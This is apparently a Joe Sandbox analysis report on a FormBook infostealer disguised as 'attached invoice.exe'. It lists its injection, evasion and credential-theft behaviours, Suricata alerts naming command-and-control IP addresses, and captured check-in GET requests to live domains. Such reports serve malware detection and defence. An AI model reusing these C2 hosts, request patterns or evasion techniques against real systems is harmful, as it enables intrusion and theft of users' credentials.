Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
attached invoice.exe

Overview

General Information

Sample name:attached invoice.exe
Analysis ID:1567213
MD5:d367df87fa58083dbd4a3e0337f3b1b8
SHA1:8250a887a1a59913de5a1b8e461ad2bad73a7546
SHA256:51f793789b534af84e377bfa1d9686038108885b89f05e3966e34ec31027f4e4
Infos:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected AntiVM3
Yara detected FormBook
.NET source code contains potential unpacker
Found direct / indirect Syscall (likely to bypass EDR)
Initial sample is a PE file and has a suspicious name
Injects a PE file into a foreign processes
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Performs DNS queries to domains with low reputation
Queues an APC in another process (thread injection)
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses cacls to modify the permissions of files
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w10x64native
  • attached invoice.exe (PID: 4584 cmdline: "C:\Users\user\Desktop\attached invoice.exe" MD5: D367DF87FA58083DBD4A3E0337F3B1B8)
    • attached invoice.exe (PID: 7256 cmdline: "C:\Users\user\Desktop\attached invoice.exe" MD5: D367DF87FA58083DBD4A3E0337F3B1B8)
      • RAVCpl64.exe (PID: 5368 cmdline: "C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe" -s MD5: 731FB4B2E5AFBCADAABB80D642E056AC)
        • cacls.exe (PID: 196 cmdline: "C:\Windows\SysWOW64\cacls.exe" MD5: 00BAAE10C69DAD58F169A3ED638D6C59)
          • firefox.exe (PID: 7184 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: 7B12552FD2A5948256B20EC97B708F94)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Formbook, FormboFormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware.
  • SWEED
  • Cobalt
https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000006.00000002.815527565060.00000000029C0000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
    00000004.00000002.811737594560.0000000000400000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
      00000006.00000002.815527779212.0000000002A60000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
        00000004.00000002.811798316588.0000000006CB0000.00000040.10000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
          Process Memory Space: attached invoice.exe PID: 4584JoeSecurity_AntiVM_3Yara detected AntiVM_3Joe Security

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            4.2.attached invoice.exe.400000.0.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
              4.2.attached invoice.exe.400000.0.raw.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security

                Sigma Signatures

                No Sigma rule has matched

                Suricata Signatures

                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-03T09:46:36.488058+010020283713Unknown Traffic192.168.11.304986023.209.72.40443TCP
                2024-12-03T09:47:39.905261+010020283713Unknown Traffic192.168.11.304986223.209.72.40443TCP
                2024-12-03T09:49:46.472651+010020283713Unknown Traffic192.168.11.304989723.44.201.22443TCP
                2024-12-03T09:51:43.253969+010020283713Unknown Traffic192.168.11.3049930104.208.16.95443TCP
                2024-12-03T09:51:52.911174+010020283713Unknown Traffic192.168.11.304993423.209.72.40443TCP
                2024-12-03T09:55:02.379173+010020283713Unknown Traffic192.168.11.304996123.209.72.40443TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-03T09:47:41.441153+010020507451Malware Command and Control Activity Detected192.168.11.304986374.208.236.15680TCP
                2024-12-03T09:48:05.301968+010020507451Malware Command and Control Activity Detected192.168.11.304986784.32.84.3280TCP
                2024-12-03T09:48:18.645129+010020507451Malware Command and Control Activity Detected192.168.11.304987213.248.169.4880TCP
                2024-12-03T09:48:32.218635+010020507451Malware Command and Control Activity Detected192.168.11.304987666.29.149.4680TCP
                2024-12-03T09:48:45.495495+010020507451Malware Command and Control Activity Detected192.168.11.30498803.33.130.19080TCP
                2024-12-03T09:48:59.970320+010020507451Malware Command and Control Activity Detected192.168.11.3049884129.226.153.8580TCP
                2024-12-03T09:49:14.510292+010020507451Malware Command and Control Activity Detected192.168.11.3049888104.21.7.18780TCP
                2024-12-03T09:49:30.034731+010020507451Malware Command and Control Activity Detected192.168.11.3049892103.230.159.8680TCP
                2024-12-03T09:49:44.460049+010020507451Malware Command and Control Activity Detected192.168.11.304989643.156.176.25380TCP
                2024-12-03T09:49:59.191939+010020507451Malware Command and Control Activity Detected192.168.11.304990131.31.196.1780TCP
                2024-12-03T09:50:13.261399+010020507451Malware Command and Control Activity Detected192.168.11.304990531.31.196.1780TCP
                2024-12-03T09:50:26.571805+010020507451Malware Command and Control Activity Detected192.168.11.3049909172.67.159.2480TCP
                2024-12-03T09:50:40.292986+010020507451Malware Command and Control Activity Detected192.168.11.3049913103.224.182.24280TCP
                2024-12-03T09:50:54.126112+010020507451Malware Command and Control Activity Detected192.168.11.304991784.32.84.3280TCP
                2024-12-03T09:51:08.411111+010020507451Malware Command and Control Activity Detected192.168.11.3049921185.68.16.16080TCP
                2024-12-03T09:51:22.513791+010020507451Malware Command and Control Activity Detected192.168.11.3049925185.134.245.11380TCP
                2024-12-03T09:51:30.851730+010020507451Malware Command and Control Activity Detected192.168.11.304992674.208.236.15680TCP
                2024-12-03T09:51:44.524793+010020507451Malware Command and Control Activity Detected192.168.11.304993184.32.84.3280TCP
                2024-12-03T09:51:57.672727+010020507451Malware Command and Control Activity Detected192.168.11.304993613.248.169.4880TCP
                2024-12-03T09:52:11.145885+010020507451Malware Command and Control Activity Detected192.168.11.304994066.29.149.4680TCP
                2024-12-03T09:52:27.340347+010020507451Malware Command and Control Activity Detected192.168.11.30499443.33.130.19080TCP
                2024-12-03T09:52:41.673824+010020507451Malware Command and Control Activity Detected192.168.11.3049948129.226.153.8580TCP
                2024-12-03T09:52:56.088849+010020507451Malware Command and Control Activity Detected192.168.11.3049952104.21.7.18780TCP
                2024-12-03T09:53:10.826772+010020507451Malware Command and Control Activity Detected192.168.11.3049956103.230.159.8680TCP
                2024-12-03T09:53:25.118345+010020507451Malware Command and Control Activity Detected192.168.11.304996043.156.176.25380TCP

                Joe Sandbox Signatures

                Click to jump to signature section

                Show All Signature Results

                AV Detection

                barindex
                Multi AV Scanner detection for submitted file
                Source: attached invoice.exeReversingLabs: Detection: 39%
                Yara detected FormBook
                Source: Yara matchFile source: 4.2.attached invoice.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 4.2.attached invoice.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000006.00000002.815527565060.00000000029C0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.811737594560.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.815527779212.0000000002A60000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.811798316588.0000000006CB0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Machine Learning detection for sample
                Source: attached invoice.exeJoe Sandbox ML: detected
                Source: attached invoice.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: attached invoice.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                Source: Binary string: cacls.pdbGCTL source: attached invoice.exe, 00000004.00000002.811738027901.0000000001457000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: cacls.pdb source: attached invoice.exe, 00000004.00000002.811738027901.0000000001457000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: wntdll.pdbUGP source: attached invoice.exe, 00000004.00000002.811738580273.00000000018B0000.00000040.00001000.00020000.00000000.sdmp, cacls.exe, 00000006.00000002.815528250415.0000000002DB0000.00000040.00001000.00020000.00000000.sdmp, cacls.exe, 00000006.00000003.811737963910.0000000002A60000.00000004.00000020.00020000.00000000.sdmp, cacls.exe, 00000006.00000003.811741649304.0000000002C0B000.00000004.00000020.00020000.00000000.sdmp, cacls.exe, 00000006.00000002.815528250415.0000000002EDD000.00000040.00001000.00020000.00000000.sdmp
                Source: Binary string: wntdll.pdb source: attached invoice.exe, attached invoice.exe, 00000004.00000002.811738580273.00000000018B0000.00000040.00001000.00020000.00000000.sdmp, cacls.exe, cacls.exe, 00000006.00000002.815528250415.0000000002DB0000.00000040.00001000.00020000.00000000.sdmp, cacls.exe, 00000006.00000003.811737963910.0000000002A60000.00000004.00000020.00020000.00000000.sdmp, cacls.exe, 00000006.00000003.811741649304.0000000002C0B000.00000004.00000020.00020000.00000000.sdmp, cacls.exe, 00000006.00000002.815528250415.0000000002EDD000.00000040.00001000.00020000.00000000.sdmp
                Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeCode function: 4x nop then mov ebx, 00000004h5_2_007B54BE
                Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeCode function: 4x nop then mov ebx, 00000004h5_2_046D05BC
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 4x nop then mov ebx, 00000004h6_2_02B604BE
                Source: C:\Program Files\Mozilla Firefox\firefox.exeCode function: 4x nop then mov ebx, 00000004h7_2_0000014045E2D4BE

                Networking

                barindex
                Suricata IDS alerts for network traffic
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.11.30:49901 -> 31.31.196.17:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.11.30:49876 -> 66.29.149.46:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.11.30:49880 -> 3.33.130.190:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.11.30:49863 -> 74.208.236.156:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.11.30:49867 -> 84.32.84.32:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.11.30:49872 -> 13.248.169.48:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.11.30:49884 -> 129.226.153.85:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.11.30:49936 -> 13.248.169.48:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.11.30:49909 -> 172.67.159.24:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.11.30:49888 -> 104.21.7.187:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.11.30:49896 -> 43.156.176.253:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.11.30:49921 -> 185.68.16.160:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.11.30:49960 -> 43.156.176.253:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.11.30:49905 -> 31.31.196.17:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.11.30:49940 -> 66.29.149.46:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.11.30:49931 -> 84.32.84.32:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.11.30:49892 -> 103.230.159.86:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.11.30:49948 -> 129.226.153.85:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.11.30:49926 -> 74.208.236.156:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.11.30:49925 -> 185.134.245.113:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.11.30:49952 -> 104.21.7.187:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.11.30:49917 -> 84.32.84.32:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.11.30:49913 -> 103.224.182.242:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.11.30:49944 -> 3.33.130.190:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.11.30:49956 -> 103.230.159.86:80
                Performs DNS queries to domains with low reputation
                Source: DNS query: www.aktmarket.xyz
                Source: Joe Sandbox ViewIP Address: 13.248.169.48 13.248.169.48
                Source: Joe Sandbox ViewIP Address: 103.224.182.242 103.224.182.242
                Source: Joe Sandbox ViewASN Name: AMAZON-02US AMAZON-02US
                Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
                Source: Joe Sandbox ViewASN Name: MAMMOTHMEDIA-AS-APMammothMediaPtyLtdAU MAMMOTHMEDIA-AS-APMammothMediaPtyLtdAU
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.11.30:49860 -> 23.209.72.40:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.11.30:49862 -> 23.209.72.40:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.11.30:49930 -> 104.208.16.95:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.11.30:49934 -> 23.209.72.40:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.11.30:49897 -> 23.44.201.22:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.11.30:49961 -> 23.209.72.40:443
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKdate: Tue, 03 Dec 2024 08:50:32 GMTserver: Apacheset-cookie: __tad=1733215832.7605882; expires=Fri, 01-Dec-2034 08:50:32 GMT; Max-Age=315360000vary: Accept-Encodingcontent-encoding: gzipcontent-length: 579content-type: text/html; charset=UTF-8connection: closeData Raw: 1f 8b 08 00 00 00 00 00 00 03 8d 54 c1 6e db 30 0c 3d c7 5f 41 b8 07 3b e8 6a a5 08 d6 01 89 ed 1d 06 0c d8 b0 c3 d0 6e e7 41 91 e9 58 ad 2d 79 12 93 34 2b f2 ef a3 1c 37 ed ba 43 ab 8b 2d ea 3d f2 3d 9a 72 de 50 d7 96 51 de a0 ac f8 41 9a 5a 2c 3d a2 c7 3d 66 3b 5c 79 4d 98 8b 63 38 ca bd 72 ba 27 a0 7d 8f 45 4c 78 4f e2 56 6e e5 31 1a 83 77 aa 88 c5 ad 17 b5 36 6b 74 bd d3 86 84 d6 35 66 9d 36 d9 ad 8f cb 5c 1c b1 af a5 2a a3 ad 74 e0 b0 d2 0e 15 fd 6a b5 b9 83 02 92 86 a8 5f 08 b1 db ed b2 17 12 05 ae fe 5c 89 8f c9 32 8a 84 80 1b 24 90 40 ba 43 bb 21 b0 35 cc 67 33 e8 b4 72 d6 a3 b2 a6 f2 40 16 f0 1e d5 86 90 81 8f 75 40 d7 40 0d c2 33 f9 d0 3b db 69 cf 31 a9 5b 0f b5 75 e0 6d 87 4c 91 de 9a a8 de 18 45 da 1a 3e 6e db 95 54 77 d7 63 aa 74 0a 0f d1 64 a7 4d 65 77 59 6b 95 0c a8 cc 61 df 4a 85 e9 3f c6 ce 93 ba 2f 2e 3e 24 d3 65 74 88 22 72 fb c0 64 95 9e c0 55 ee c7 68 a2 00 8f 34 6e d2 97 d5 de 05 83 cc 9f 84 ae d5 fd f7 51 73 01 9f 9f 9c 7c bd 61 1d b2 4a 1f 3a 6b 34 59 0e ad 17 41 b6 c7 43 60 9e 58 d1 64 92 71 13 4c 5a f7 50 94 9c 2d 5b 23 db 99 9e e2 fc 32 71 e8 37 2d 85 f3 07 08 fb b1 b0 0b 3a 83 9d e4 fc 88 c8 b6 da 87 62 5f aa e5 00 53 2d ca 47 4b e9 93 bb e9 f1 f4 6d ed 0a 65 06 42 d0 7d 00 c6 aa 26 45 e7 86 8e ff ff 1d 86 ae 3e 9f 3b da f3 28 c3 ca 56 dc 68 08 d8 b5 b3 1b 53 2d ce 2e 67 97 6a 7e 05 07 60 f4 00 62 da 78 2d 06 f4 6a ad 6c 6b 5d 11 9f d5 c3 8a 21 8c 2d 6f 67 c3 e2 a1 cd 2b bd 85 81 5b 24 95 f6 ac 7e bf 00 63 0d 2e 93 32 97 d0 38 ac 8b d7 87 38 8c c3 3c 29 3f b5 5a dd 41 83 0e 87 69 35 84 2e 17 92 af 10 17 e1 52 c6 8e 96 f2 0e 89 73 73 d6 0b fc bd d1 db 22 e6 32 dc fe 26 06 9e 22 62 62 11 cf 96 f0 f3 fa 5b f1 a6 d2 ef c3 35 3d 65 e7 1e 04 f3 43 2f c2 9f e2 2f c3 6b b1 89 30 04 00 00 Data Ascii: Tn0=_A;jnAX-y4+7C-==rPQAZ,==f;\yMc8r'}ELxOVn1w6kt5f6\*tj_\2$@C!5g3r@u@@3;i1[umLE>nTwctdMewYkaJ?/.>$et"rdUh4nQs|aJ:k4YAC`XdqLZP-[#2q7-:b_S-GKmeB}&E>;(VhS-.gj~`bx-jlk]!-og+[$~c.288<)?ZAi5.Rss"2&"bb[5=eC//k0
                Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKdate: Tue, 03 Dec 2024 08:50:34 GMTserver: Apacheset-cookie: __tad=1733215834.8600757; expires=Fri, 01-Dec-2034 08:50:34 GMT; Max-Age=315360000vary: Accept-Encodingcontent-encoding: gzipcontent-length: 579content-type: text/html; charset=UTF-8connection: closeData Raw: 1f 8b 08 00 00 00 00 00 00 03 8d 54 c1 6e db 30 0c 3d c7 5f 41 b8 07 3b e8 6a a5 08 d6 01 89 ed 1d 06 0c d8 b0 c3 d0 6e e7 41 91 e9 58 ad 2d 79 12 93 34 2b f2 ef a3 1c 37 ed ba 43 ab 8b 2d ea 3d f2 3d 9a 72 de 50 d7 96 51 de a0 ac f8 41 9a 5a 2c 3d a2 c7 3d 66 3b 5c 79 4d 98 8b 63 38 ca bd 72 ba 27 a0 7d 8f 45 4c 78 4f e2 56 6e e5 31 1a 83 77 aa 88 c5 ad 17 b5 36 6b 74 bd d3 86 84 d6 35 66 9d 36 d9 ad 8f cb 5c 1c b1 af a5 2a a3 ad 74 e0 b0 d2 0e 15 fd 6a b5 b9 83 02 92 86 a8 5f 08 b1 db ed b2 17 12 05 ae fe 5c 89 8f c9 32 8a 84 80 1b 24 90 40 ba 43 bb 21 b0 35 cc 67 33 e8 b4 72 d6 a3 b2 a6 f2 40 16 f0 1e d5 86 90 81 8f 75 40 d7 40 0d c2 33 f9 d0 3b db 69 cf 31 a9 5b 0f b5 75 e0 6d 87 4c 91 de 9a a8 de 18 45 da 1a 3e 6e db 95 54 77 d7 63 aa 74 0a 0f d1 64 a7 4d 65 77 59 6b 95 0c a8 cc 61 df 4a 85 e9 3f c6 ce 93 ba 2f 2e 3e 24 d3 65 74 88 22 72 fb c0 64 95 9e c0 55 ee c7 68 a2 00 8f 34 6e d2 97 d5 de 05 83 cc 9f 84 ae d5 fd f7 51 73 01 9f 9f 9c 7c bd 61 1d b2 4a 1f 3a 6b 34 59 0e ad 17 41 b6 c7 43 60 9e 58 d1 64 92 71 13 4c 5a f7 50 94 9c 2d 5b 23 db 99 9e e2 fc 32 71 e8 37 2d 85 f3 07 08 fb b1 b0 0b 3a 83 9d e4 fc 88 c8 b6 da 87 62 5f aa e5 00 53 2d ca 47 4b e9 93 bb e9 f1 f4 6d ed 0a 65 06 42 d0 7d 00 c6 aa 26 45 e7 86 8e ff ff 1d 86 ae 3e 9f 3b da f3 28 c3 ca 56 dc 68 08 d8 b5 b3 1b 53 2d ce 2e 67 97 6a 7e 05 07 60 f4 00 62 da 78 2d 06 f4 6a ad 6c 6b 5d 11 9f d5 c3 8a 21 8c 2d 6f 67 c3 e2 a1 cd 2b bd 85 81 5b 24 95 f6 ac 7e bf 00 63 0d 2e 93 32 97 d0 38 ac 8b d7 87 38 8c c3 3c 29 3f b5 5a dd 41 83 0e 87 69 35 84 2e 17 92 af 10 17 e1 52 c6 8e 96 f2 0e 89 73 73 d6 0b fc bd d1 db 22 e6 32 dc fe 26 06 9e 22 62 62 11 cf 96 f0 f3 fa 5b f1 a6 d2 ef c3 35 3d 65 e7 1e 04 f3 43 2f c2 9f e2 2f c3 6b b1 89 30 04 00 00 Data Ascii: Tn0=_A;jnAX-y4+7C-==rPQAZ,==f;\yMc8r'}ELxOVn1w6kt5f6\*tj_\2$@C!5g3r@u@@3;i1[umLE>nTwctdMewYkaJ?/.>$et"rdUh4nQs|aJ:k4YAC`XdqLZP-[#2q7-:b_S-GKmeB}&E>;(VhS-.gj~`bx-jlk]!-og+[$~c.288<)?ZAi5.Rss"2&"bb[5=eC//k0
                Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKdate: Tue, 03 Dec 2024 08:50:37 GMTserver: Apacheset-cookie: __tad=1733215837.7810391; expires=Fri, 01-Dec-2034 08:50:37 GMT; Max-Age=315360000vary: Accept-Encodingcontent-encoding: gzipcontent-length: 579content-type: text/html; charset=UTF-8connection: closeData Raw: 1f 8b 08 00 00 00 00 00 00 03 8d 54 c1 6e db 30 0c 3d c7 5f 41 b8 07 3b e8 6a a5 08 d6 01 89 ed 1d 06 0c d8 b0 c3 d0 6e e7 41 91 e9 58 ad 2d 79 12 93 34 2b f2 ef a3 1c 37 ed ba 43 ab 8b 2d ea 3d f2 3d 9a 72 de 50 d7 96 51 de a0 ac f8 41 9a 5a 2c 3d a2 c7 3d 66 3b 5c 79 4d 98 8b 63 38 ca bd 72 ba 27 a0 7d 8f 45 4c 78 4f e2 56 6e e5 31 1a 83 77 aa 88 c5 ad 17 b5 36 6b 74 bd d3 86 84 d6 35 66 9d 36 d9 ad 8f cb 5c 1c b1 af a5 2a a3 ad 74 e0 b0 d2 0e 15 fd 6a b5 b9 83 02 92 86 a8 5f 08 b1 db ed b2 17 12 05 ae fe 5c 89 8f c9 32 8a 84 80 1b 24 90 40 ba 43 bb 21 b0 35 cc 67 33 e8 b4 72 d6 a3 b2 a6 f2 40 16 f0 1e d5 86 90 81 8f 75 40 d7 40 0d c2 33 f9 d0 3b db 69 cf 31 a9 5b 0f b5 75 e0 6d 87 4c 91 de 9a a8 de 18 45 da 1a 3e 6e db 95 54 77 d7 63 aa 74 0a 0f d1 64 a7 4d 65 77 59 6b 95 0c a8 cc 61 df 4a 85 e9 3f c6 ce 93 ba 2f 2e 3e 24 d3 65 74 88 22 72 fb c0 64 95 9e c0 55 ee c7 68 a2 00 8f 34 6e d2 97 d5 de 05 83 cc 9f 84 ae d5 fd f7 51 73 01 9f 9f 9c 7c bd 61 1d b2 4a 1f 3a 6b 34 59 0e ad 17 41 b6 c7 43 60 9e 58 d1 64 92 71 13 4c 5a f7 50 94 9c 2d 5b 23 db 99 9e e2 fc 32 71 e8 37 2d 85 f3 07 08 fb b1 b0 0b 3a 83 9d e4 fc 88 c8 b6 da 87 62 5f aa e5 00 53 2d ca 47 4b e9 93 bb e9 f1 f4 6d ed 0a 65 06 42 d0 7d 00 c6 aa 26 45 e7 86 8e ff ff 1d 86 ae 3e 9f 3b da f3 28 c3 ca 56 dc 68 08 d8 b5 b3 1b 53 2d ce 2e 67 97 6a 7e 05 07 60 f4 00 62 da 78 2d 06 f4 6a ad 6c 6b 5d 11 9f d5 c3 8a 21 8c 2d 6f 67 c3 e2 a1 cd 2b bd 85 81 5b 24 95 f6 ac 7e bf 00 63 0d 2e 93 32 97 d0 38 ac 8b d7 87 38 8c c3 3c 29 3f b5 5a dd 41 83 0e 87 69 35 84 2e 17 92 af 10 17 e1 52 c6 8e 96 f2 0e 89 73 73 d6 0b fc bd d1 db 22 e6 32 dc fe 26 06 9e 22 62 62 11 cf 96 f0 f3 fa 5b f1 a6 d2 ef c3 35 3d 65 e7 1e 04 f3 43 2f c2 9f e2 2f c3 6b b1 89 30 04 00 00 Data Ascii: Tn0=_A;jnAX-y4+7C-==rPQAZ,==f;\yMc8r'}ELxOVn1w6kt5f6\*tj_\2$@C!5g3r@u@@3;i1[umLE>nTwctdMewYkaJ?/.>$et"rdUh4nQs|aJ:k4YAC`XdqLZP-[#2q7-:b_S-GKmeB}&E>;(VhS-.gj~`bx-jlk]!-og+[$~c.288<)?ZAi5.Rss"2&"bb[5=eC//k0
                Source: global trafficHTTP traffic detected: GET /raea/?6aonl5x=PqKj/8KuIq0WSNkJftYVxtH3PgUbwps1M43YI/iJd5qBB0feLv8ZTW6bO6iF0HlQbmuDykhZpdeI6maFWjppzEXgG+P+iq4B6j/LVXeOdEURVWf/EIQOijo=&wYHk=M_B-ghc2HqoWhmeC HTTP/1.1Accept: */*Accept-Language: en-US,en;q=0.9Host: www.christinascuties.netConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.2.2; SPH-L720 Build/JDQ39) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Mobile Safari/537.36
                Source: global trafficHTTP traffic detected: GET /jytl/?6aonl5x=g6hM5OfAy0aZTOdzzizqGwSFwxhc1L9nbH1D7PSRWxwlxqBVZ/VTfBjjReyEGXu+lurHf7fRU8SuqLFFtve4Dt4YiF/6MWt/ODdeGnRIPeEv+Y3Y8H3JjIc=&wYHk=M_B-ghc2HqoWhmeC HTTP/1.1Accept: */*Accept-Language: en-US,en;q=0.9Host: www.techmiseajour.netConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.2.2; SPH-L720 Build/JDQ39) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Mobile Safari/537.36
